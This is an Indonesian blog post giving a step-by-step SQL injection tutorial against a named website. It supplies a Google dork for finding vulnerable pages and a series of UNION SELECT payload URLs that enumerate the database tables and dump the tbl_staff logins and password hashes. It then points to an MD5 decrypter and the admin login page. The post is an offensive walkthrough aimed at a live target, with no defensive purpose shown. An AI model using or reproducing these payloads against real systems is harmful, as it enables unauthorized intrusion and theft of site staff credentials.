468x60 ads

Monday, 8 April 2013

Langkah langkah menggunakan sql injection

Dork : "inurl:content.php?id=" site:info, Di posting yang ke 20 ini BELAJAR LINUX lagi - lagi membuat threat SQL INJECTION, untuk kamu yang masih blom pakek backtrack linux, hmmmm.. sengasara juga kalo ga ada sqlmap tuh mau gak mau harus manual, oia lanjut lagi tutornya
Untuk Dork masih banyak yang lain, dan akan ada di postingan berikutnya :D
Untuk target kali ini >> http://www.mirbg.info/content.php?id=23

Tambah string ' (tanda kutip ganda) di akhir Url, jika vuln maka akan ada tulisan seperti ini Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in/home/mirbg/public_html/content.php on line 9


http://www.mirbg.info/content.php?id=23'



Lakukan perintah order by sampai pesan eror muncul lagi


http://www.mirbg.info/content.php?id=23 order by 1-- (Normal)
http://www.mirbg.info/content.php?id=23 order by 2-- (Normal)
http://www.mirbg.info/content.php?id=23 order by 3-- (Normal)
http://www.mirbg.info/content.php?id=23 order by 4-- (Erorr)


Kesimpulannya kita mengambil yang 3 atau table nya berjumlah 3 :D
Selanjutnya lakukan dengan perintah union all select
http://www.mirbg.info/content.php?id=-23 union all select 1,2,3--
Lihat angka berapa yang kita dapat =))


Kebetulan muncul angka 2 mas broo,.. ayo lanjutkan !!
Next... kita musti mengetahui versi web tersebut,. dengan perintah version() atau @@version http://www.mirbg.info/content.php?id=-23 union all select 1,version(),3--

Keterangan : kita bisa lanjutkan tutorial ini jika target web versi 5.1.56-log, kalu versi 4 main tebak-tebakan =)) kwkwkwkwkw, bagi yang mau boleh aja..
ok next..
Mencari table dengan perintah table_name dan di akhir url tambah from information_schema.tables--

http://www.mirbg.info/content.php?id=-23 union all select 1,table_name,3 from information_schema.tables--

Lanjut,..
dengan perintah group_concat dan di akhir url tambah ini where table_schema=database()--
http://www.mirbg.info/content.php?id=-23 union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--




Ok, kita mendapatkan banyak table =))
TBL_TEXTS_SEQ,tbl_articles,tbl_content,tbl_form1,tbl_form2,
tbl_languages,tbl_staff,tbl_staff_sessions,tbl_texts,tbl_words

kita buka table yang penting-penting saja (biasanya untuk login)
Sebelum meng inject anda harus menubah table tersebut ke hexa decimal
contoh kita mengambil tbl_staff dan hexadecimalnya adalah 74626c5f7374616666
Jadi >>
http://www.mirbg.info/content.php?id=-23 union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x74626c5f7374616666--

Liat apa yang anda dapat =))
isi dari tbl_staff
s_id,s_name,s_login,s_pass,s_admin,s_id,s_name,s_login,s_pass,s_admin

Lihat isi column dengan perintah concat_ws(table_yang_berisi_user_dan_pass)
di akhir url from nama_table_berasal--
http://www.mirbg.info/content.php?id=-23 union all select 1,concat_ws(0x3a,s_login,0x3a,s_pass),3 from tbl_staff
Lihat dan nikmati apa yang kamu dapatkan, :D
Lanjutkan dengan mencari login page
http://www.mirbg.info/admin/index.php
dan untuk password admin, biasanya harus di deckrypt dulu di MD5 Decrypter

Keterangan :
MD5 Decrypter --> http://www.md5decrypter.co.uk/
Converter string to Hexa ---> http://www.string-functions.com/string-hex.aspx

Maaf kalu berantakan :P soalnya kalo di rapihin nanti bingung bacanya karna ini tutorial ok's : GOLDSPLOIT






Sumber : http://www.setandarisurga.com

1 comments:

hahaha... nyari order by -- nya pegel bg

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More